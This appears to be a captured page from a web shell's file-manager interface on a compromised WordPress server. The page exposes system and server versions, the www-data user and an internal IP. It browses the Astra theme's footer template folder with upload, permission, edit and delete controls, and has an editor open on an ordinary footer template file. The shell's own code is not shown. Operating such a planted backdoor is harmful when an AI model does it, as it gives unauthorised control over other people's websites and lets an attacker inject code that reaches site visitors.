[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
themes
/
astra
/
template-parts
/
footer
/
builder
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 components.php
4,173 B
SET
[ EDIT ]
|
[ DEL ]
📄 desktop-builder-layout.php
684 B
SET
[ EDIT ]
|
[ DEL ]
📄 footer-row.php
3,454 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: desktop-builder-layout.php
<?php /** * Template part for displaying the footer info. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package Astra * @since 1.0.0 */ ?> <footer <?php echo wp_kses_post( astra_attr( 'footer', array( 'id' => 'colophon', 'class' => join( ' ', astra_get_footer_classes() ), ) ) ); ?> > <?php astra_footer_content_top(); ?> <?php /** * Astra Top footer */ do_action( 'astra_above_footer' ); /** * Astra Middle footer */ do_action( 'astra_primary_footer' ); /** * Astra Bottom footer */ do_action( 'astra_below_footer' ); ?> <?php astra_footer_content_bottom(); ?> </footer><!-- #colophon -->